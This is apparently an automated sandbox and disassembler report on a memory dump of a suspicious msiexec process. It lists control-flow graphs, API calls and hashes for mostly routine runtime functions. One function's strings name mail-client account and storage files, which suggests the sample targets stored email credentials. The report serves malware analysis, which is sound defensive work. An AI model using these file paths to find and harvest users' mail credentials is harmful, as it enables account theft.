                                                                                              control_flow_graph 304 24ed9492-24ed94ef GetConsoleCP 305 24ed94f5-24ed9511 304->305 306 24ed9632-24ed9644 call 24ed2ada 304->306 307 24ed952c-24ed953d call 24ed7c19 305->307 308 24ed9513-24ed952a 305->308 316 24ed953f-24ed9542 307->316 317 24ed9563-24ed9565 307->317 310 24ed9566-24ed9575 call 24ed79e6 308->310 310->306 318 24ed957b-24ed959b WideCharToMultiByte 310->318 319 24ed9609-24ed9628 316->319 320 24ed9548-24ed955a call 24ed79e6 316->320 317->310 318->306 321 24ed95a1-24ed95b7 WriteFile 318->321 319->306 320->306 327 24ed9560-24ed9561 320->327 323 24ed95b9-24ed95ca 321->323 324 24ed962a-24ed9630 GetLastError 321->324 323->306 326 24ed95cc-24ed95d0 323->326 324->306 328 24ed95fe-24ed9601 326->328 329 24ed95d2-24ed95f0 WriteFile 326->329 327->318 328->305 331 24ed9607 328->331 329->324 330 24ed95f2-24ed95f6 329->330 330->306 332 24ed95f8-24ed95fb 330->332 331->306 332->328
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,24ED9C07,?,00000000,?,00000000,00000000), ref: 24ED94D4
                                                                                              • __fassign.LIBCMT ref: 24ED954F
                                                                                              • __fassign.LIBCMT ref: 24ED956A
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 24ED9590
                                                                                              • WriteFile.KERNEL32(?,?,00000000,24ED9C07,00000000,?,?,?,?,?,?,?,?,?,24ED9C07,?), ref: 24ED95AF
                                                                                              • WriteFile.KERNEL32(?,?,00000001,24ED9C07,00000000,?,?,?,?,?,?,?,?,?,24ED9C07,?), ref: 24ED95E8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 7055502428f651d9dba928548150d28d5063b91cd6931e1b843d83b577b06c3e
                                                                                              • Instruction ID: a8d90516d9201c7c1b9e912ad83c2619469978b4a085653d82a102ecdf925a4e
                                                                                              • Opcode Fuzzy Hash: 7055502428f651d9dba928548150d28d5063b91cd6931e1b843d83b577b06c3e
                                                                                              • Instruction Fuzzy Hash: 6B518072E00209EFEB00CFA4DC95AEEBBF9EF19310F14455AF555E7285D6709942CBA0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 333 24ed3370-24ed33b5 call 24ed3330 call 24ed37a7 338 24ed33b7-24ed33c9 333->338 339 24ed3416-24ed3419 333->339 340 24ed3439-24ed3442 338->340 342 24ed33cb 338->342 339->340 341 24ed341b-24ed3428 call 24ed3790 339->341 345 24ed342d-24ed3436 call 24ed3330 341->345 344 24ed33d0-24ed33e7 342->344 346 24ed33fd 344->346 347 24ed33e9-24ed33f7 call 24ed3740 344->347 345->340 349 24ed3400-24ed3405 346->349 354 24ed340d-24ed3414 347->354 355 24ed33f9 347->355 349->344 352 24ed3407-24ed3409 349->352 352->340 356 24ed340b 352->356 354->345 357 24ed33fb 355->357 358 24ed3443-24ed344c 355->358 356->345 357->349 359 24ed344e-24ed3455 358->359 360 24ed3486-24ed3496 call 24ed3774 358->360 359->360 361 24ed3457-24ed3466 call 24edbbe0 359->361 366 24ed3498-24ed34a7 call 24ed3790 360->366 367 24ed34aa-24ed34c6 call 24ed3330 call 24ed3758 360->367 369 24ed3468-24ed3480 361->369 370 24ed3483 361->370 366->367 369->370 370->360
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 24ED339B
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 24ED33A3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 24ED3431
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 24ED345C
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 24ED34B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 340762137a0695e716a1debf31702f3761653d457c188c65c2b85c526dc206e5
                                                                                              • Instruction ID: 5fa7632d734bd8de24c7bd181a92b11936ec46ee5c8c7b508fb8ea805905cb95
                                                                                              • Opcode Fuzzy Hash: 340762137a0695e716a1debf31702f3761653d457c188c65c2b85c526dc206e5
                                                                                              • Instruction Fuzzy Hash: C341B636A00208DBEB01CFA8C884A9EBFB9AF45228F108155E915AB355D7B5DA16CB91

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 24ED9221: _free.LIBCMT ref: 24ED924A
                                                                                              • _free.LIBCMT ref: 24ED92AB
                                                                                                • Part of subcall function 24ED571E: HeapFree.KERNEL32(00000000,00000000,?,24ED924F,?,00000000,?,00000000,?,24ED9276,?,00000007,?,?,24ED7E5A,?), ref: 24ED5734
                                                                                                • Part of subcall function 24ED571E: GetLastError.KERNEL32(?,?,24ED924F,?,00000000,?,00000000,?,24ED9276,?,00000007,?,?,24ED7E5A,?,?), ref: 24ED5746
                                                                                              • _free.LIBCMT ref: 24ED92B6
                                                                                              • _free.LIBCMT ref: 24ED92C1
                                                                                              • _free.LIBCMT ref: 24ED9315
                                                                                              • _free.LIBCMT ref: 24ED9320
                                                                                              • _free.LIBCMT ref: 24ED932B
                                                                                              • _free.LIBCMT ref: 24ED9336
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                              • Instruction ID: 31ed99c88bff6caf7fdeebe1e8734c28cb8a87a8a059a11c85196ef6612905d0
                                                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                              • Instruction Fuzzy Hash: DC113073540B08FAFB20AFF0FD46FCB7B9DAF24700F404825A699B609ADA75B5068751

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 415 24ed8821-24ed883a 416 24ed883c-24ed884c call 24ed9341 415->416 417 24ed8850-24ed8855 415->417 416->417 424 24ed884e 416->424 419 24ed8857-24ed885f 417->419 420 24ed8862-24ed8886 MultiByteToWideChar 417->420 419->420 422 24ed888c-24ed8898 420->422 423 24ed8a19-24ed8a2c call 24ed2ada 420->423 425 24ed88ec 422->425 426 24ed889a-24ed88ab 422->426 424->417 429 24ed88ee-24ed88f0 425->429 430 24ed88ad-24ed88bc call 24edbf20 426->430 431 24ed88ca-24ed88db call 24ed56d0 426->431 433 24ed8a0e 429->433 434 24ed88f6-24ed8909 MultiByteToWideChar 429->434 430->433 440 24ed88c2-24ed88c8 430->440 431->433 441 24ed88e1 431->441 439 24ed8a10-24ed8a17 call 24ed8801 433->439 434->433 438 24ed890f-24ed892a call 24ed5f19 434->438 438->433 447 24ed8930-24ed8937 438->447 439->423 444 24ed88e7-24ed88ea 440->444 441->444 444->429 448 24ed8939-24ed893e 447->448 449 24ed8971-24ed897d 447->449 448->439 452 24ed8944-24ed8946 448->452 450 24ed897f-24ed8990 449->450 451 24ed89c9 449->451 455 24ed89ab-24ed89bc call 24ed56d0 450->455 456 24ed8992-24ed89a1 call 24edbf20 450->456 453 24ed89cb-24ed89cd 451->453 452->433 454 24ed894c-24ed8966 call 24ed5f19 452->454 457 24ed89cf-24ed89e8 call 24ed5f19 453->457 458 24ed8a07-24ed8a0d call 24ed8801 453->458 454->439 468 24ed896c 454->468 455->458 471 24ed89be 455->471 456->458 470 24ed89a3-24ed89a9 456->470 457->458 472 24ed89ea-24ed89f1 457->472 458->433 468->433 473 24ed89c4-24ed89c7 470->473 471->473 474 24ed8a2d-24ed8a33 472->474 475 24ed89f3-24ed89f4 472->475 473->453 476 24ed89f5-24ed8a05 WideCharToMultiByte 474->476 475->476 476->458 477 24ed8a35-24ed8a3c call 24ed8801 476->477 477->439
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,24ED6FFD,00000000,?,?,?,24ED8A72,?,?,00000100), ref: 24ED887B
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,24ED8A72,?,?,00000100,5EFC4D8B,?,?), ref: 24ED8901
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 24ED89FB
                                                                                              • __freea.LIBCMT ref: 24ED8A08
                                                                                                • Part of subcall function 24ED56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24ED5702
                                                                                              • __freea.LIBCMT ref: 24ED8A11
                                                                                              • __freea.LIBCMT ref: 24ED8A36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 9d53cc7bbda2ef82b547b6b50818f93e7a144837b6bc653e0c3b68634682dc1a
                                                                                              • Instruction ID: 65d2ad99f2fe530c45f19c9aea6d82765921db96846d4abf3393eb57515551de
                                                                                              • Opcode Fuzzy Hash: 9d53cc7bbda2ef82b547b6b50818f93e7a144837b6bc653e0c3b68634682dc1a
                                                                                              • Instruction Fuzzy Hash: F051C073610216EBFB158F60CC40EAB7BADFF50A94F114669FD34E6188EB35DC528690

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • _strlen.LIBCMT ref: 24ED1607
                                                                                              • _strcat.LIBCMT ref: 24ED161D
                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,24ED190E,?,?,00000000,?,00000000), ref: 24ED1643
                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,24ED190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 24ED165A
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,24ED190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 24ED1661
                                                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,24ED190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 24ED1686
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                              • String ID:
                                                                                              • API String ID: 1922816806-0
                                                                                              • Opcode ID: 30f884cf842d5e433dd885c5d9e757fed7376f9a8f4ae643323cef9c740d9078
                                                                                              • Instruction ID: ddb029fb3a9c6fde6c681e064f3fb5909524e870d74dd43fd3a3a61518a29907
                                                                                              • Opcode Fuzzy Hash: 30f884cf842d5e433dd885c5d9e757fed7376f9a8f4ae643323cef9c740d9078
                                                                                              • Instruction Fuzzy Hash: B221D637900204EBF7059B54EC80EFE77BDEF98710F14405AE504BB145EB34A94287A5

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 24ED1038
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 24ED104B
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 24ED1061
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 24ED1075
                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 24ED1090
                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 24ED10B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 3594823470-0
                                                                                              • Opcode ID: 90d18615dd1e76a8ccfe4fc0847265a59e6d6e6aa5d6233495c06c8514926461
                                                                                              • Instruction ID: c6443bf987ed7bdeef9fc49af997f794c21c41afff8b1f81ce713afc4b6ecc9d
                                                                                              • Opcode Fuzzy Hash: 90d18615dd1e76a8ccfe4fc0847265a59e6d6e6aa5d6233495c06c8514926461
                                                                                              • Instruction Fuzzy Hash: E021833790032CDBEF11DB60EC48DDF776DEF88218F104296E955A71A5DE309A86CB80

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,24ED3518,24ED23F1,24ED1F17), ref: 24ED3864
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 24ED3872
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 24ED388B
                                                                                              • SetLastError.KERNEL32(00000000,?,24ED3518,24ED23F1,24ED1F17), ref: 24ED38DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 9ce72253f58a1a87266cb4b1b4d8eb16240c83cabd8df2d16a09678299a20b2d
                                                                                              • Instruction ID: f01e438cc4fe2295bd32ce328c47e03daddf5962cfa1810656aed9e4c5b750e0
                                                                                              • Opcode Fuzzy Hash: 9ce72253f58a1a87266cb4b1b4d8eb16240c83cabd8df2d16a09678299a20b2d
                                                                                              • Instruction Fuzzy Hash: B501D437709711EEF31517797C88D0A2B9DDF656BAB200279F111B91DAEFD548038350
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,24ED6C6C), ref: 24ED5AFA
                                                                                              • _free.LIBCMT ref: 24ED5B2D
                                                                                              • _free.LIBCMT ref: 24ED5B55
                                                                                              • SetLastError.KERNEL32(00000000,?,?,24ED6C6C), ref: 24ED5B62
                                                                                              • SetLastError.KERNEL32(00000000,?,?,24ED6C6C), ref: 24ED5B6E
                                                                                              • _abort.LIBCMT ref: 24ED5B74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: 70f4fa93c5efe1bff3b9ee3f354614e36e4de46080559f99c5fecfdb882ec5cf
                                                                                              • Instruction ID: 032f197ddc7b771fe8b2dfe587ddc1a8c3c8402a68f8272bd2f32ca07ca17912
                                                                                              • Opcode Fuzzy Hash: 70f4fa93c5efe1bff3b9ee3f354614e36e4de46080559f99c5fecfdb882ec5cf
                                                                                              • Instruction Fuzzy Hash: C0F06277644A00FBF30327347C48E1E2A6EDFE6976F250125F915BA189FE2989034364
                                                                                              APIs
                                                                                                • Part of subcall function 24ED1E89: lstrlenW.KERNEL32(?,?,?,?,?,24ED10DF,?,?,?,00000000), ref: 24ED1E9A
                                                                                                • Part of subcall function 24ED1E89: lstrcatW.KERNEL32(?,?,?,24ED10DF,?,?,?,00000000), ref: 24ED1EAC
                                                                                                • Part of subcall function 24ED1E89: lstrlenW.KERNEL32(?,?,24ED10DF,?,?,?,00000000), ref: 24ED1EB3
                                                                                                • Part of subcall function 24ED1E89: lstrlenW.KERNEL32(?,?,24ED10DF,?,?,?,00000000), ref: 24ED1EC8
                                                                                                • Part of subcall function 24ED1E89: lstrcatW.KERNEL32(?,24ED10DF,?,24ED10DF,?,?,?,00000000), ref: 24ED1ED3
                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 24ED122A
                                                                                                • Part of subcall function 24ED173A: _strlen.LIBCMT ref: 24ED1855
                                                                                                • Part of subcall function 24ED173A: _strlen.LIBCMT ref: 24ED1869
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                              • API String ID: 4036392271-1520055953
                                                                                              • Opcode ID: d58ac701af4eecc0fe35f9b8c9c96ea17c80b9d0bdbee13bb5db9d088100bd07
                                                                                              • Instruction ID: 7fdf413cd5ad7b5d26b334b0057114bdd75299346b434dc527e784cea7687f66
                                                                                              • Opcode Fuzzy Hash: d58ac701af4eecc0fe35f9b8c9c96ea17c80b9d0bdbee13bb5db9d088100bd07
                                                                                              • Instruction Fuzzy Hash: 6421C3BAE10208AAFB1597A0EC91FEEB33DEF94714F000546F604FB1D4EAB11D828758
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,24ED4AEA,?,?,24ED4A8A,?,24EE2238,0000000C,24ED4BBD,00000000,00000000), ref: 24ED4B59
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 24ED4B6C
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,24ED4AEA,?,?,24ED4A8A,?,24EE2238,0000000C,24ED4BBD,00000000,00000000,00000001,24ED2082), ref: 24ED4B8F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: cc437743951b63ae0dc33fa4d43ffa63a70ff8d5a241d0c0b013837bb113fb60
                                                                                              • Instruction ID: f8d02e413c1a0b8e5a01e40c955927417e0de4ef7cde8cb37a290a8450a1d171
                                                                                              • Opcode Fuzzy Hash: cc437743951b63ae0dc33fa4d43ffa63a70ff8d5a241d0c0b013837bb113fb60
                                                                                              • Instruction Fuzzy Hash: 69F03C32900108EBEB159B91DC18FADBFBDEF59266F0041A4F906AA154DB349952CA90
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 24ED715C
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 24ED717F
                                                                                                • Part of subcall function 24ED56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24ED5702
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 24ED71A5
                                                                                              • _free.LIBCMT ref: 24ED71B8
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 24ED71C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: f972422c4ac00def50ca687c0b1a9331f2b025f9af53617f720644c50ef4a894
                                                                                              • Instruction ID: c94afc1f82adb2cfece777c9483ce8f3c1e96871c231fe82023b4e0472537e6c
                                                                                              • Opcode Fuzzy Hash: f972422c4ac00def50ca687c0b1a9331f2b025f9af53617f720644c50ef4a894
                                                                                              • Instruction Fuzzy Hash: 79017173602A25FB73110BB66C89D7F6E6EDBCB9A5711036AFD04D7244EA658C03C1B4
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,?,00000000,24ED636D,24ED5713,00000000,?,24ED2249,?,?,24ED1D66,00000000,?,?,00000000), ref: 24ED5B7F
                                                                                              • _free.LIBCMT ref: 24ED5BB4
                                                                                              • _free.LIBCMT ref: 24ED5BDB
                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24ED5BE8
                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24ED5BF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 2db839d600f5aa76df89f9c9553fea9ec161687ebbbfdc7e1b2be41f5c90873a
                                                                                              • Instruction ID: ae0284897932286f351bac6c5270dd5136d0f5f13d4e8375028cf8c372d6e95e
                                                                                              • Opcode Fuzzy Hash: 2db839d600f5aa76df89f9c9553fea9ec161687ebbbfdc7e1b2be41f5c90873a
                                                                                              • Instruction Fuzzy Hash: ED01AF77205601FBF30367386C84E2F2A6EDFD65767200168F916B618AEE6989034764
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,24ED10DF,?,?,?,00000000), ref: 24ED1E9A
                                                                                              • lstrcatW.KERNEL32(?,?,?,24ED10DF,?,?,?,00000000), ref: 24ED1EAC
                                                                                              • lstrlenW.KERNEL32(?,?,24ED10DF,?,?,?,00000000), ref: 24ED1EB3
                                                                                              • lstrlenW.KERNEL32(?,?,24ED10DF,?,?,?,00000000), ref: 24ED1EC8
                                                                                              • lstrcatW.KERNEL32(?,24ED10DF,?,24ED10DF,?,?,?,00000000), ref: 24ED1ED3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$lstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 493641738-0
                                                                                              • Opcode ID: 32021197458669fcc4abd8940a74c7c21f7da8b762175c609370d7836a0a3dfc
                                                                                              • Instruction ID: 9bdebe939a3eb2c34ae7325337231e4f843d30f0fa3b8b4814934c37d0d50b68
                                                                                              • Opcode Fuzzy Hash: 32021197458669fcc4abd8940a74c7c21f7da8b762175c609370d7836a0a3dfc
                                                                                              • Instruction Fuzzy Hash: 2BF08227540214FAF621272AFC85EBFBB7DEFCAA61B044019FA08971909B58684392B5
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 24ED91D0
                                                                                                • Part of subcall function 24ED571E: HeapFree.KERNEL32(00000000,00000000,?,24ED924F,?,00000000,?,00000000,?,24ED9276,?,00000007,?,?,24ED7E5A,?), ref: 24ED5734
                                                                                                • Part of subcall function 24ED571E: GetLastError.KERNEL32(?,?,24ED924F,?,00000000,?,00000000,?,24ED9276,?,00000007,?,?,24ED7E5A,?,?), ref: 24ED5746
                                                                                              • _free.LIBCMT ref: 24ED91E2
                                                                                              • _free.LIBCMT ref: 24ED91F4
                                                                                              • _free.LIBCMT ref: 24ED9206
                                                                                              • _free.LIBCMT ref: 24ED9218
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: ba23ac7abe278710953c87f04f6a88bc3520194d2d667948853d96ddb8a26263
                                                                                              • Instruction ID: 4dc45823fac5e5cd8e60709507f832ab9e62b09504d6348523147a45aa268558
                                                                                              • Opcode Fuzzy Hash: ba23ac7abe278710953c87f04f6a88bc3520194d2d667948853d96ddb8a26263
                                                                                              • Instruction Fuzzy Hash: 24F0F973614240DBB710DB68EAC5C1A7FEDEF24629B611805F94AF758CCA74F8828A64
                                                                                              APIs
